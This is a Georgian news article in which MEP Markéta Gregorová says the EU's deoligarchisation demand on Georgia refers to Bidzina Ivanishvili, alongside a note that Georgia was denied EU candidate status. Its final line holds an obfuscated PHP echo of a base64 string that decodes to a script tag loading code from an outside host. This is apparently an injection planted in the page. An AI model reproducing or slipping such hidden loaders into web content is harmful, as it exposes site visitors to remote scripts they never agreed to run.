celsiusi
ავერსი საქკაბელი

ევროპარლამენტარი მარკეტა გრეგოროვა ამბობს, რომ ოლიგარქი არის ბიძინა ივანიშვილი და ევროპარლამენტი დეოლიგარქციზაციისკენ მოწოდებაში სწორედ მას გულისხმობს.

ამის შესახებ მან ინტერპრესნიუსთან განაცხადა. მისი განმარტებით, დეოლიგარქიზაციის გაგება ორგვარად შეიძლება და მასში იგულისხმება სისტემის შექმნა, რომლის გამოყენებას კონკრეტული პირები საკუთარი სარგებლისთვის ვერ შეძლებენ.

"ეს [დეოლიგარქიზაციისკენ მოწოდება] ორგვარად შეგვიძლია გავიგოთ. ევროპარლამენტისგან ეს გასაკვირი არ არის, რადგან ჩვენ უკვე ვახსენეთ ივანიშვილი ერთ-ერთ რეზოლუციაში - დიახ, ჩვენ ვფიქრობთ, რომ ის არის ოლიგარქი და ეს მას ეხება, თუმცა ჩვენ როგორც ევროკავშირი - კომისია, საბჭო და პარლამენტი ვგულისხმობთ დეოლიგარქიზაციაში სისტემის შექმნას, რომლის შელახვასაც კონკრეტული პირები ვერ შეძლებენ და საკუთარი სარგებლობისთვის ვერ გამოიყენებენ. საბოლოო ჯამში, უკვე მნიშვნელობა არ აქვს ეს ივანიშვილი იქნება თუ ვინმე სხვა, რადგან თუ სისტემა სათანადოდ იქნება შემუშავებული, ისინი ვერ შეძლებენ მის შელახვას და სწორედ ეს არის საკვანძო ნაწილი", - თქვა მარკეტა გრეგოროვამ.

ცნობისთვის, ევროკომისიის დასკვნის საფუძველზე ევროსაბჭომ უკრაინასა და მოლდოვას ევროკავშირის კანდიდატის სტატუსი მიანიჭა, საქართველოს - არა. ევროკომისიამ ქვეყანას 12-პუნქტიანი რეკომენდაციების შესრულება დაავალა, რომლის ერთ-ერთი მთავარი კომპონენტი დეოლიგარქიზაციაა. მმართველი გუნდი ამტკიცებს, რომ აღნიშნული ბიძინა ივანიშვილს არ ეხება, რადგან მათი თქმით, ივანიშვილი არა ოლიგარქი, არამედ ქველმოქმედია. 

 

537
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");